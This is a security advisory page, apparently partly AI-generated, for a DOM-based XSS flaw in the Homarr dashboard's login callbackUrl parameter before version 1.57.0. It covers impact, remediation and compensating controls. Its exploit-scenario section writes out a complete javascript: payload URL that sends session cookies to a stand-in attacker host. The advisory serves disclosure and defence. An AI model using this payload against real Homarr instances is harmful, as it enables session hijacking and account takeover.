Weakness
CWE
Exploitation Conditions

Homarr versions prior to 1.57.0. Remote attacker crafts malicious link with crafted callbackUrl parameter on /auth/login page. Victim must click the link while authenticated. No special configuration required—vulnerability exists in default installations.

Impact

While the CVSS base score of 8.8 (High) reflects serious potential impact with network attack vector (AV:N), low complexity (AC:L), no privileges required (PR:N), and changed scope (S:C), real-world exploitation risk requires nuanced assessment. The UI:R (user interaction required) constraint means successful exploitation depends on social engineering to trick authenticated users into clicking malicious links. No public exploit code exists and the vulnerability is not listed in CISA's KEV catalog, indicating no confirmed active exploitation. EPSS data was not provided, but typical DOM-XSS vulnerabilities in niche open-source projects show moderate exploitation probability unless widely deployed in enterprise environments. The SSVC decision framework would likely classify this as 'scheduled' priority rather than 'immediate' given the authentication page context limits attack surface compared to authenticated session vulnerabilities. Organizations using Homarr should prioritize patching based on deployment exposure and user population rather than CVSS alone.

Exploit ScenarioDerived

An attacker identifies a company using Homarr for internal dashboard access and crafts a phishing email with a malicious link to the organization's Homarr instance: https://company-homarr.internal/auth/login?callbackUrl=javascript:fetch('https://attacker.com/steal?cookie='+document.cookie). When an employee clicks the link and authenticates, the DOM-based XSS executes immediately after login, exfiltrating their session cookies to the attacker's server. With stolen credentials, the attacker accesses internal dashboards, pivots to connected systems visible through Homarr integrations, or performs unauthorized configuration changes. The low attack complexity and network-based vector make this exploitable through standard phishing campaigns without requiring technical sophistication, though user interaction provides a defensive opportunity through security awareness training.

AnalysisAIv1 – Apr 06, 2026

DOM-based Cross-Site Scripting in Homarr dashboard versions prior to 1.57.0 allows unauthenticated remote attackers to execute arbitrary JavaScript in victims' browsers via malicious callbackUrl parameters on the /auth/login page. Despite the high CVSS score of 8.8, no public exploit code or active exploitation has been identified at time of analysis. The vulnerability enables credential theft and unauthorized actions when authenticated users click crafted links, with scope change indicating potential cross-domain impact.

RemediationAI

Upgrade Homarr to version 1.57.0 or later, which contains fixes for the improper callbackUrl parameter handling. The patched version implements proper input validation and sanitization for redirect parameters to prevent JavaScript injection through the authentication page. Organizations should update immediately if Homarr is exposed to untrusted networks or users. Until patching is complete, consider implementing web application firewall rules to block suspicious callbackUrl patterns containing javascript:, data:, or vbscript: protocol handlers, though this is only a temporary mitigation. No workarounds are documented in the vendor advisory. Complete remediation details and upgrade instructions are available in the GitHub Security Advisory at https://github.com/homarr-labs/homarr/security/advisories/GHSA-79pg-554g-rw82.

Technical ContextAI · show details

Homarr is an open-source customizable dashboard platform. This vulnerability stems from CWE-87 (Improper Neutralization of Alternate XSS Syntax), manifesting as a DOM-based XSS flaw where the application's authentication login page unsafely handles the callbackUrl parameter. The parameter value flows directly into client-side redirect functions (redirect and router.push) without proper sanitization or validation. Unlike reflected XSS, DOM-based XSS executes entirely in the browser's Document Object Model, allowing attackers to inject javascript: protocol handlers or data: URIs that execute in the victim's security context. The changed scope (S:C) in the CVSS vector indicates the vulnerability can affect resources beyond the vulnerable component's authorization scope, likely due to improper origin validation in the redirect mechanism enabling cross-domain attacks.

DescriptionGitHub Advisory

Homarr is an open-source dashboard. Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's /auth/login page. The application improperly trusts a URL parameter (callbackUrl), which is passed to redirect and router.push. An attacker can craft a malicious link that, when opened by an authenticated user, performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential theft, internal network pivoting, and unauthorized actions performed on behalf of the victim. This vulnerability is fixed in 1.57.0.

Executive ViewAI

Why It Matters

Homarr dashboard versions before 1.57.0 contain a DOM-based XSS vulnerability in the login page that allows unauthenticated attackers to inject malicious code targeting your users. This creates immediate risk of credential theft and session hijacking if users click attacker-crafted links, affecting any organization using Homarr for dashboard access control.

Business Impact: High
Compensating Controls

Vendor-released patch: Homarr version 1.57.0. If immediate patching is not feasible, implement network-level controls: restrict /auth/login access by IP where possible, deploy WAF rules to sanitize callbackUrl parameters, enforce Content Security Policy headers to block inline script execution, and educate users to verify login page URLs before credential entry.
